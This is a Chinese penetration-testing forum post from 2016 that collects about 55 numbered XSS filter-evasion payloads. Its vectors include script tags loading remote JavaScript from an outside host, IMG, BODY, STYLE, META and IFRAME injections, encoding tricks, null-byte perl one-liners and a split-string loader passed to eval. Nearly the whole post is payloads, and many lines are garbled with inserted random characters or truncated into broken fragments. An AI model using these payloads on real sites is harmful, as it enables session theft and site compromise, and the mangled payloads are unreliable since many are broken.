中国网络渗透测试联盟

标题: XSS攻击汇总 [打印本页]
作者: admin    时间: 2016-4-28 10:06
标题: XSS攻击汇总
(1)普通的XSS JavaScript注入
4 v& Y: k. S# X* V' f<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
# ~: D4 |" O7 C* s: Z3 ^1 ?(99)另类弹框$ X) Z9 ~. E3 Q" |) x( I  N; }
<q/oncut=alert()>1
1 d' Y9 k/ ?+ s8 k) n6 A3 j<s/onclick=alert()>b8 }$ y" D9 C, t, q2 W& X1 B) r% B; m
<XSS=" onclick="alert(1)//">clickme</SSX=">
' X5 y& M& a9 l# q <zzz onclick=alert`1`>clickme</zzz> 8 {9 J2 j1 z- V; q0 S- s0 Y1 Y6 D
<a onclick=alert`1`>clickme</a>- C8 V: j' Q9 a0 y. t) |
<a=">clickme</a=">( |3 J  V. g; {5 N6 Y3 H/ p
<a=">clickme</a>& i7 F9 N# R& n2 W& b- [: x
<z=">clickme</z=">  `; z! e; \8 |) s* G5 D+ @
<z onclick=alert`1`>clickme</z>
) w2 h1 v1 c8 n+ X4 i* E, q- N) D* p) E% G0 d3 e. v; c9 |9 r( v
(2)IMG标签XSS使用JavaScript命令
0 k% k! v" q5 W1 n2 H$ O<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
- d+ J0 ]( s) q: m2 U& Q7 N; F9 }7 e# T) D8 _* n6 r. x
(3)IMG标签无分号无引号3 I, ^4 j. J# V! S# [7 V4 f. t, Z
<IMG SRC=javascript:alert(‘XSS’)>  n& k3 b* ?  \4 y% k

# m3 X7 C. H/ Q0 _( g(4)IMG标签大小写不敏感
7 l7 X* ]% k1 R$ U1 z  _<IMG SRC=JaVaScRiPt:alert(‘XSS’)>: a- d* k- a/ \) h

/ W$ h8 _  t9 `(5)HTML编码(必须有分号)* h. S! G) `4 t) [, T
<IMG SRC=javascript:alert(“XSS”)>
) ]  U, H, i: }: G4 _- m3 O" p" o% B2 t+ {) f
(6)修正缺陷IMG标签: `3 h/ U* U% X( U' M
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>3 m9 E5 |" z8 i! g+ X4 Z0 A
5 S; B! h+ i+ }* S% M! b$ D
(7)formCharCode标签(计算器)& [2 D, m9 ?; y9 `
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>" V8 @6 {. ?) a5 s9 r
8 ^/ g6 @3 U) h2 X
(8)UTF-8的Unicode编码(计算器)+ v) ?/ K, L9 [& t2 g( F' H
<IMG SRC=jav..省略..S')>
% a7 {/ b% a( [" r% N( V7 Y" i3 M
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
1 c( y! w7 V! i! d& S# y/ ~<IMG SRC=jav..省略..S')>
$ e- Z# y+ X* l3 ]
* |, W, ]- p) R. q8 p(10)十六进制编码也是没有分号(计算器)
+ M: E$ W# v) N0 i<IMG SRC=\'#\'" /span>
9 v% l. u- G5 v% P, y& @7 ]& K( a0 D' m9 O
(11)嵌入式标签,将Javascript分开4 K6 X% g. r" v1 B$ j0 y2 L" V
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>4 w/ _. d2 @7 A+ A! _3 }# Q3 r

8 j/ H" x: O& U6 @5 V2 j(12)嵌入式编码标签,将Javascript分开% I# P% B, e" }; W% B; X8 d
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>( V% \. u3 N- q  q. Q

: L) L, J' A! I& G- L(13)嵌入式换行符
- a  q- v- y: |! x2 z<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
: M0 c: p' z- ?0 R. C, O7 C, T# ^( b' S6 ~, H* e+ |% |9 Z  Z! w
(14)嵌入式回车
' I" O& T9 g- l+ i3 l: _, V9 n<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
0 O" J+ p0 V9 R& H
0 K6 l& ^% s" }4 m% k(15)嵌入式多行注入JavaScript,这是XSS极端的例子
9 d4 L3 A3 ^9 Y1 U( V& r6 }+ x<IMG SRC=\'#\'" /span>/ V2 I& c+ {4 d) T

) P+ C1 h( Q" }; m(16)解决限制字符(要求同页面)
; Z% e* r6 E+ {) e7 [- E<script>z=’document.’</script>
' U$ O0 m& b! N$ b. s<script>z=z+’write(“‘</script>7 E( `7 j" a" C& n5 V$ ?( ]/ i
<script>z=z+’<script’</script># {/ S. l* v2 u7 F% l* A1 L
<script>z=z+’ src=ht’</script>
1 t, O' X8 ]! m2 R. I<script>z=z+’tp://ww’</script>
  {2 i, T% G, E2 G3 ~3 u; m<script>z=z+’w.shell’</script>
( H6 y! W" [! D9 E<script>z=z+’.net/1.’</script>1 B" t; {1 I4 H; a# k: F
<script>z=z+’js></sc’</script>
2 q! d" G2 P  C+ V1 i( e  }<script>z=z+’ript>”)’</script>
. J' Q& H$ M9 P7 Z- q1 ?% z  k<script>eval_r(z)</script>
6 o9 j2 v/ d: c% S; G5 Y5 i& p* M+ c
(17)空字符0 [1 b/ F5 J5 t- {+ K& J! Z; h
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
( i/ ^: d$ h3 a) c
! m0 g: t+ q& }! q( m3 n: C" t(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用, \0 I# ]# U% g, @4 g- u6 w
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
% I! g& y" a& M/ \" ^8 [6 P
8 S+ ?3 ~9 ]- }- R& `(19)Spaces和meta前的IMG标签
' j- q( K$ q$ n<IMG SRC=\'#\'"   javascript:alert(‘XSS’);”>
! y8 H$ L. K( h" _/ N$ c4 a4 |# R  b
6 j! d2 S; T$ L: s8 `7 U3 F! a(20)Non-alpha-non-digit XSS
5 @/ X  V. t- z# `% ~+ n<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>" B; K' h7 @( b5 a) b' n

/ {# _6 ~+ \! b  \1 \" g(21)Non-alpha-non-digit XSS to 2
& |; U) m' C4 H: v/ [$ T<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>3 K; P% t2 ]3 o4 _* d2 n
/ W3 T; c# y* t# H' z0 c7 X# M/ K) ^
(22)Non-alpha-non-digit XSS to 3
% t# \, O8 {& |  m' N3 {<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>5 V3 l- Q& J  C+ o
0 s  Y% \6 }& V! l6 m6 ^4 V
(23)双开括号
+ f# u$ i+ {# x/ F1 n% V1 ?" ]<<SCRIPT>alert(“XSS”);//<</SCRIPT>
, C% X; }4 c3 W2 y! [; i; z: j
3 S% D7 z! H. e4 i  Z% P8 E; o(24)无结束脚本标记(仅火狐等浏览器)  i7 o" C# a) d5 s
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
$ p3 w  ^( z( [& v
. p. q4 m& u& r. ](25)无结束脚本标记2; B+ R; B6 z) c
<SCRIPT SRC=//3w.org/XSS/xss.js>
; g% Z: V1 A8 k2 g" a$ ]& w
, }6 e7 b- M6 y) Y(26)半开的HTML/JavaScript XSS
' ^5 i  G  X! Y0 M0 e+ G) _  i<IMG SRC=\'#\'" /span>; p0 N$ K1 l* A3 K
( K3 B! i0 s3 T6 ^8 G! O; R& q& n- P
(27)双开角括号+ _% R7 w0 g. d+ T5 k9 H& C
<iframe src=http://3w.org/XSS.html <
. Z  _5 V& y7 W% x6 z( |0 S* e; ^1 X( y
(28)无单引号 双引号 分号7 N0 Z  X2 Y8 N! d# Q& X; _
<SCRIPT>a=/XSS/
( B1 n$ U* s2 `$ _alert(a.source)</SCRIPT>
1 D- S6 R+ e0 l; M( Y1 g# A6 V2 k
2 ]5 @$ ^4 G+ ?" l7 ?7 i(29)换码过滤的JavaScript
5 P/ c; X4 W/ u\”;alert(‘XSS’);//
5 q2 K3 h! b9 `% [! W6 q/ T7 L+ r# J/ b& W% i
(30)结束Title标签: j( K# K+ j! X" C
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
( Z$ l# |4 |; J- f; S+ |
8 F- L7 r  t; k(31)Input Image1 @8 y( W5 \, M: C( U! i
<INPUT SRC=\'#\'" /span>+ p8 U+ }: r. n0 a1 K# ?8 o
# R) Z3 P" Y* f" {2 q5 v& C
(32)BODY Image
# r# x# T% H# S+ q1 s3 }<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
' z$ v0 l* v1 P4 X
/ |! O2 v# W1 y, B: O, F& {6 \. H(33)BODY标签
, G: i0 Q# F7 T( n' ^# d5 `<BODY(‘XSS’)>
* h! K9 u8 s& C/ N& @
. l% I2 ]( L; W: y(34)IMG Dynsrc
& K5 |2 Z" J8 {; N! {1 f<IMG DYNSRC=\'#\'" /span>. x& e' L( e# M) e3 d4 [( n2 h5 D

" _! E) Z3 o" A/ X7 @+ @- P  [(35)IMG Lowsrc+ z7 s1 `' l1 Z- v% }+ ^; I2 w
<IMG LOWSRC=\'#\'" /span>
" Y& e+ i! \. b9 N
0 |3 t6 u$ Z. z& u/ M( Y(36)BGSOUND
& H' ]( Z/ x5 _' o8 ^2 s<BGSOUND SRC=\'#\'" /span>
5 z$ m& G8 Z* s  d
+ @5 w" w- O$ H(37)STYLE sheet# H7 t* |! ~; ^4 W6 ?9 i5 Z
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>" ^5 G+ W2 N- a
2 e5 U6 U& I% Y5 S8 V
(38)远程样式表
% P) g4 b$ d# ?% l! p6 j6 o<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
# t, c* Y9 i9 D: X; s9 F$ u* `. N6 A2 `  W8 X  N8 Y
(39)List-style-image(列表式)9 g8 @) v1 D8 r" X$ v: E
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS8 R! B! ~3 w. V3 H

0 F# o0 b1 @+ m(40)IMG VBscript
7 f- E+ E% Q4 L& ~<IMG SRC=\'#\'" /STYLE><UL><LI>XSS. J0 F+ u6 Y2 t2 L
" ~$ w) B5 v! r6 G1 o  }
(41)META链接url
- K2 o, [+ t0 t! m$ f<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>, u3 E' ?0 E0 N

: X. v) g& _- x- S7 L(42)Iframe. Z1 ]9 `, U1 m8 |0 ^/ P5 i
<IFRAME SRC=\'#\'" /IFRAME>- k! _9 ]' X* }8 I' q( h* ~% r

( {5 `$ |* j! M& A(43)Frame
& v. n! [, q( n5 o( ~, R! E<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>8 K- l7 M+ ?$ [
0 g! `/ z8 J' i: t5 i$ q8 d3 C. |
(44)Table: ], ^! o6 @1 m& Q
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
! ]/ E6 F; h: X
0 N8 e" b3 d: }% V2 T. y$ z(45)TD8 M2 U  W% H! ]* r+ M, K
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>4 _0 N/ N; @( Y9 A

6 }5 A+ a1 y9 n(46)DIV background-image0 J3 C2 p, c5 Y. X
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”># B" b, s. O; X& h! L/ W2 b# @
8 O' V2 C: O+ L! v4 c4 Z. q
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
) O' d% I( j, ~% w5 y# {<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>1 q$ M. c# [6 t$ y

/ ~0 v  O6 _$ `  r# [" A/ m(48)DIV expression& r( [* O) }( b% b' u7 D% d
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>& {' J' m- A, ]
7 K; O+ o: k0 E" _4 X
(49)STYLE属性分拆表达
5 n) n5 i4 P; }- |! i<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>7 ^3 T9 W* K) O8 W  {; R: ^6 \

1 m2 @: E" |8 F(50)匿名STYLE(组成:开角号和一个字母开头)
  A4 C$ `& b) a; x) V% ]( y<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>% f0 ~6 j. o, R: ?# u) X

# y& p+ I% }% Q- i. [(51)STYLE background-image
; t! B  @& H- ^7 n4 [) J<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>1 q- ~& c) {) ]& q* k

! k$ d' B: j) `0 Y$ c4 t& y$ x5 E(52)IMG STYLE方式' Q( b! `; A) V: W
exppression(alert(“XSS”))’>- e; C: X7 }% ^4 g
8 h) S; z0 j. J' m1 `
(53)STYLE background
9 g5 g4 f1 ^) T- r<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
3 ~* K, \) B2 E+ m, a
# }* T( D; T( }" [8 x, [9 @# P(54)BASE
3 Z* T2 Q  O7 c% ~; H9 i) z; w<BASE HREF=”javascript:alert(‘XSS’);//”>% h2 `6 g4 Z9 i+ t9 w1 x/ R

, [5 `1 O7 o" W8 D  `) a(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS! q% T; f4 t8 _7 i$ ~: N& @0 x
<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf” ></EMBED>
( ]! \8 n6 U4 `3 Y' u8 v



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2